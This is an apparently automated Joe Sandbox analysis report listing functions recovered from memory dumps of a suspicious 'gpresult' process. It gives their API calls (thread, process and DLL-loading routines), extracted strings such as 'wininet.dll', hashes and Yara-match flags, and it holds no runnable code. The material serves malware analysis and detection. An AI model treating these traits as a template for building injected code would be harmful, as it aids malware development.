Function 04902AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902ADA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80888daf7ede224ca18023e165d21d58ea667f20313133bc8a5fd6f274f4ec90
Instruction ID: 437ba08e0a5dd2eb816c0ea5870d54822d71d0bb975bbd35c1b3a05afeb795f6
Opcode Fuzzy Hash: 80888daf7ede224ca18023e165d21d58ea667f20313133bc8a5fd6f274f4ec90
Instruction Fuzzy Hash: 43900225251504032105F5580708507108A8BD6355355C032F1116551CD721D9616121

Function 04902AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902AFA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38ccc9eecc082539df1f3308ec1ecf6dec0a73b90fc964509cf45371b9f61635
Instruction ID: e3315d0ae23d81638c489226e1db7be97d4c933f624858979bcbdf839ee11d3d
Opcode Fuzzy Hash: 38ccc9eecc082539df1f3308ec1ecf6dec0a73b90fc964509cf45371b9f61635
Instruction Fuzzy Hash: EA900225261504032145F558060850B14899BD7355395C026F1517591CC721D9656321

Function 04902BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902BAA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 913846606e8b0c9449f3f482e7db33c9d4733470e731293f65b24156bf0fd6e1
Instruction ID: 2b3e4e10d5f98226522f1c1cf7bd22bde0d05075f65b3088f651a444eb17455f
Opcode Fuzzy Hash: 913846606e8b0c9449f3f482e7db33c9d4733470e731293f65b24156bf0fd6e1
Instruction Fuzzy Hash: 5190023164550C03F150B158441874610498BD1305F55C022A0125655D8755DB5576A1

Function 04902BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902BFA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 410eb5977c919fe6cdb6fdf4122e7fb7b74f31a359914e8e1df39f434be153fd
Instruction ID: e2c834e7cd3b7e4dcf712785b745b749cdab3dc1eb468c4ea8f00384039e2705
Opcode Fuzzy Hash: 410eb5977c919fe6cdb6fdf4122e7fb7b74f31a359914e8e1df39f434be153fd
Instruction Fuzzy Hash: 2A90023124150C03F180B158440864A10498BD2305F95C026A0126655DCB15DB5977A1

Function 04902BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902BEA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33c6d168ca91318d4c55c84a8b3577ab70dad86722f83aee513502125c3a9f92
Instruction ID: aa908b284009e7ec3c4fda3ca4b54288dfade93e093d2049bd20dadd16760ec2
Opcode Fuzzy Hash: 33c6d168ca91318d4c55c84a8b3577ab70dad86722f83aee513502125c3a9f92
Instruction Fuzzy Hash: 2190023124554C43F140B1584408A4610598BD1309F55C022A0165695D9725DE55B661

Function 04902B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902B6A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9727a457fbbdd22ee55db9de63178806bb77b0b3cbaae121fbfa7db24309755f
Instruction ID: 1b0c3673b1c60263636ce2f46cc9f53dff702275a397202068d276ddeaec179c
Opcode Fuzzy Hash: 9727a457fbbdd22ee55db9de63178806bb77b0b3cbaae121fbfa7db24309755f
Instruction Fuzzy Hash: 9A900261242504036105B1584418616504E8BE1205B55C032E1115591DC625D9917125

Function 049035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049035CA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
Instruction ID: a83d41ff0ebd33bf658dd72d9e958ce5d0e84c6c229227a6e98935e492ad5fe1
Opcode Fuzzy Hash: db38f67fbdf322ebba04da6c488d31a65cae5a3fc2cdc8fc6db508bd593f6aa0
Instruction Fuzzy Hash: 6590023164560803F100B158451870620498BD1205F65C422A0525569D8795DA5175A2

Function 049039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049039BA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 058daa21eee955358a6746777c65499be0e61e8160aeb1a6987005fb207289f9
Instruction ID: 4b29355a0b3e5df13d1ee93f5d6539b4821c92a23acdb9f11fa3a69ea6c0f0d7
Opcode Fuzzy Hash: 058daa21eee955358a6746777c65499be0e61e8160aeb1a6987005fb207289f9
Instruction Fuzzy Hash: 2790022128555503F150B15C44086165049ABE1205F55C032A0915595D8655D9557221

Function 00870C22 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 00870D7A

Strings

4jm-6-hL7, xrefs: 00870D6D, 00870D79, 00870D8A
4jm-6-hL7, xrefs: 00870D81, 00870D84

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 670b4a21185eca6570f9105dd274a037f0e4cfad91cd88d562c22c5420e0a0bb
Instruction ID: aa7419edfbab469ae08616d0c35c05e83bb534697492d467003b76b994d791b0
Opcode Fuzzy Hash: 670b4a21185eca6570f9105dd274a037f0e4cfad91cd88d562c22c5420e0a0bb
Instruction Fuzzy Hash: D3212932801258BBDB219AA4CC06FEEBF68FF82754F148255F644AB281D6759506CFA2

Function 00870C7F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 00870D7A

Strings

4jm-6-hL7, xrefs: 00870D6D, 00870D79, 00870D8A
4jm-6-hL7, xrefs: 00870D81, 00870D84

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 292f456aefabc066e54434a0bbba300b4c3f5118943a8514b8c44095585d0e69
Instruction ID: 79063dec9d5761cd17db8603332fdd439da0b9bcc6bb9ee5e4edc76b07056898
Opcode Fuzzy Hash: 292f456aefabc066e54434a0bbba300b4c3f5118943a8514b8c44095585d0e69
Instruction Fuzzy Hash: C8213B31901248BAEB219BA48C45FEFBF68FF46754F10C299F504AB281D7749606CBA6

Function 00870CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 00870D7A

Strings

4jm-6-hL7, xrefs: 00870D6D, 00870D79, 00870D8A
4jm-6-hL7, xrefs: 00870D81, 00870D84

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 17e750b8a4c6b061195a1ca29afd2a72d000b11025309e8390f449faf836486e
Instruction ID: ac1eed6f21e5663fdbb5119e302bfce21c759db8a4094c5a1b0324cf1a2ee92e
Opcode Fuzzy Hash: 17e750b8a4c6b061195a1ca29afd2a72d000b11025309e8390f449faf836486e
Instruction Fuzzy Hash: 2B110831E41258B6EB20AB948C46FEF7F7CEF41B50F048155FA04BB1C1D6B866068BE6

Function 00870D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 00870D7A

Strings

4jm-6-hL7, xrefs: 00870D6D, 00870D79, 00870D8A
4jm-6-hL7, xrefs: 00870D81, 00870D84

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 4ed07c3ea2c65bc0f819bcd9f4caa0d49e874150ed7f8bc63c863f96e875b340
Instruction ID: 1c7447f2ddc206c1cbd2aa56f79c6b327b70426e0170cb9ad9d0a7c3fdb3fe9d
Opcode Fuzzy Hash: 4ed07c3ea2c65bc0f819bcd9f4caa0d49e874150ed7f8bc63c863f96e875b340
Instruction Fuzzy Hash: BA01C431D41258B6EB21ABD48C46FEFBB7CEF41B50F048155FA04BB1C1D6B866068BE6

Function 00882C90 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00882D49

Strings

net.dll, xrefs: 00882D21, 00882D98, 00882D70, 00882D7C, 00882DA4
wininet.dll, xrefs: 00882CF8, 00882D04

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d1be3f1fe8b466c31d0d7613e530d7a4c042b4e7819c9c00104d9038989d4c77
Instruction ID: fbb8c6ea502fa28bcb952a5ee7949d1da600e911aa7cb82286b3f1a1be913b43
Opcode Fuzzy Hash: d1be3f1fe8b466c31d0d7613e530d7a4c042b4e7819c9c00104d9038989d4c77
Instruction Fuzzy Hash: 53316DB1601605BBD724EF64D885FEBBBA8FF88304F04851DF6599B245D770BA40CBA1

Function 00869692 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

w\^, xrefs: 008696BD

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID:
String ID: w\^
API String ID: 0-3762032904
Opcode ID: 009e276567429af16b6e0a980cd1053e20322bd2a01925b8b24003b54e539e02
Instruction ID: b5167906614fd4f971639c0262e3b38759655707f5e3eabba39d2ea3fcac5b8a
Opcode Fuzzy Hash: 009e276567429af16b6e0a980cd1053e20322bd2a01925b8b24003b54e539e02
Instruction Fuzzy Hash: A411527165424866EB216FE85C43FFD7F5CEF55B14F14008AE684EA2C2D5B2064543C6

Function 0087EDA5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0087EDC7

Strings

@J7<, xrefs: 0087EDDB

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 4d3536c9afe2879f2eab56ff0e8620c141c3dc0b56a8fefda90b828ed717978c
Instruction ID: d0d6634c4412ab51bbac0b6f5373f837686a9f26e99934fed587ad1a84b9a20e
Opcode Fuzzy Hash: 4d3536c9afe2879f2eab56ff0e8620c141c3dc0b56a8fefda90b828ed717978c
Instruction Fuzzy Hash: 7B313076A0060A9FDB14DFD8C8809EFB7B9FF88304B108959E519EB214D775EE05CBA1

Function 0087EDB0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0087EDC7

Strings

@J7<, xrefs: 0087EDDB

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 6140ebf9a00a183edfc03ba59f1ef5e5d1e8c2418414ed54b730bb99c9075fe7
Instruction ID: e52cbe25322ec320df6f65a02ceb95364b9b906d66aed2e921d00afab0123c3d
Opcode Fuzzy Hash: 6140ebf9a00a183edfc03ba59f1ef5e5d1e8c2418414ed54b730bb99c9075fe7
Instruction Fuzzy Hash: 78312FB6A0020A9FDB10DFD8D8809EFB7B9FF88304B108559E509EB214D775EE058BA1

Function 008746A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00874712

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 903047d8e1bdbf35d3e8a14d87945afa77ef21091bb082e63ca659c846db60c9
Instruction ID: 727715859b2fde75d885ddd6a793f7f9d7ce3e5485d0e0651f1fc79d7a3f7a09
Opcode Fuzzy Hash: 903047d8e1bdbf35d3e8a14d87945afa77ef21091bb082e63ca659c846db60c9
Instruction Fuzzy Hash: 820112B9D0010DA7DF14EAA4DC46F9DB378EB54308F048195E90CDB251F631EB14C752

Function 008884B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(008711B0,008711D8,00870FB0,00000000,00877F63,00000010,008711D8,?,?,00000044,008711D8,00000010,00877F63,00000000,00870FB0,008711D8), ref: 00888510

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 6655bc26ada52425b2f276ad2bd3021ce3e4afd6508276e3c74694b17c355646
Instruction ID: 57305a3dca1111c2488cb73cb2748b5419ccf620a201945152af05926663ebff
Opcode Fuzzy Hash: 6655bc26ada52425b2f276ad2bd3021ce3e4afd6508276e3c74694b17c355646
Instruction Fuzzy Hash: E301A2B2214108BBCB04EE89DC85EEB77ADEB8C714F418208BA09E3241D630E8518BA4

Function 00869700 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00869742

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9f219af27c23132a925c729d5718d56e6244c0a9a01df278f9e31a3c2f955712
Instruction ID: 00ef3cd8a4cce03be215907cdc4ddd87193aa583573c7c45d08782cfe27579c6
Opcode Fuzzy Hash: 9f219af27c23132a925c729d5718d56e6244c0a9a01df278f9e31a3c2f955712
Instruction Fuzzy Hash: 80F0393339020436E63065A99C07FEBB69CEB80B61F15042AF60CEB2C2D996B84142A9

Function 008883D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00871919,?,0088503B,00871919,00884777,0088503B,?,00871919,00884777,00001000,?,?,00889C80), ref: 0088840F

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction ID: 20270df314db4e6770ca5075ec845b6ddf50094b0d90e59d3eeaeee67e78d6cf
Opcode Fuzzy Hash: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction Fuzzy Hash: F0E06D712002097BD610EE98DC46FAB33ADEFC8710F048008F908E7241DA70B810CBF9

Function 00888420 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0E54BE0F,00000007,00000000,00000004,00000000,00873F80,000000F4,?,?,?,?,?), ref: 0088845C

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d0b09c1f4b93983ed745a2353312e78e600dc49642f4cbf5fae8818ac80d5180
Instruction ID: 8ee03adf58086c24c11e4f58c2605c89be425e6b1d9a398679774f7704b07917
Opcode Fuzzy Hash: d0b09c1f4b93983ed745a2353312e78e600dc49642f4cbf5fae8818ac80d5180
Instruction Fuzzy Hash: 22E06D712002047BD610EF58EC45FAB73ADEFC4710F014018F908E7241DA71B9108BF9

Function 00877FA0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00877FCA

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fd99f11d5d255b8b6f440b863ce1601d97c8fc8ab26fcd8a6d63e6a02a3f4d20
Instruction ID: 292ea63ebe37c9be7db9ef638b48da4079bb57fada8d8ef33869768190b405db
Opcode Fuzzy Hash: fd99f11d5d255b8b6f440b863ce1601d97c8fc8ab26fcd8a6d63e6a02a3f4d20
Instruction Fuzzy Hash: DCE026312483082FEA106ABC9C4AF66334CDB48724F088660F81CCB2C2DE38F802C290

Function 00877DB0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00871BF0,00886E97,00884777,?), ref: 00877DE1

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: ab17831bf027569f8e5ab6f465073e6486078f52ef900a514acdf7e767a727af
Instruction ID: 8000cd3f34d1467d4c3376040dea5344b4718c3473d1110d81e7ae24fcafddb9
Opcode Fuzzy Hash: ab17831bf027569f8e5ab6f465073e6486078f52ef900a514acdf7e767a727af
Instruction Fuzzy Hash: 4DD05E722843043BF910A6A89C0BF66328DAB00754F058064F90CD7283DCA5F51042A6

Function 04902C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902C24

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: abe9023eec5bddeb96f89fff020cee020b0d14f3c9bb1b6d092476a7ad8355e0
Instruction ID: ca5d2e87f3febd843912c9367bf81f50dbadbba5ca06e413d779b386d6b592c9
Opcode Fuzzy Hash: abe9023eec5bddeb96f89fff020cee020b0d14f3c9bb1b6d092476a7ad8355e0
Instruction Fuzzy Hash: 64B09B719415D5CAFB11F760460C71779486BD1705F15C0B6D2130686E4738D5D1F175

Non-executed Functions

Function 04902890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0490293C
___swprintf_l.LIBCMT ref: 0490295E
___swprintf_l.LIBCMT ref: 049029A3
___swprintf_l.LIBCMT ref: 0493A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0493A527
:%u.%u.%u.%u, xrefs: 0493A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0493A54E
ffff:, xrefs: 0493A504

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b8c09a9571eb16c3d5f492b78c0e0a8f31240fdf3bacf7f903a462853c16a3d7
Instruction ID: 65ad8ae189a78c4a1aa4d011b2260f3922fdadfc10fddc0f55ce311aab82ecfe
Opcode Fuzzy Hash: b8c09a9571eb16c3d5f492b78c0e0a8f31240fdf3bacf7f903a462853c16a3d7
Instruction Fuzzy Hash: 6A5109B6A00116BFDB21DF58898497EF7B9BB49205714C679E8A5D3681E334FE408BE0

Function 04972410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 049724A6
___swprintf_l.LIBCMT ref: 049724E2
___swprintf_l.LIBCMT ref: 0497257D
___swprintf_l.LIBCMT ref: 049725A3
___swprintf_l.LIBCMT ref: 049725C8
___swprintf_l.LIBCMT ref: 04972608

Strings

::%hs%u.%u.%u.%u, xrefs: 0497249E
:%u.%u.%u.%u, xrefs: 049725FF
ffff:, xrefs: 0497247D, 0497249D
::ffff:0:%u.%u.%u.%u, xrefs: 049724DA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 68fdad6ce533f827677c7336962bcc886d69e6719784fe0694052d7593772c0f
Instruction ID: 7729d2d8c28862d35f0f6d6fc8d5594feaa4fbd92bbe460ff41921da3cecd4ce
Opcode Fuzzy Hash: 68fdad6ce533f827677c7336962bcc886d69e6719784fe0694052d7593772c0f
Instruction Fuzzy Hash: 2D51D375B50645AFDB30DF9CC89097EB7FDEB48204B0488BAE4D6D7641E674FA408B60

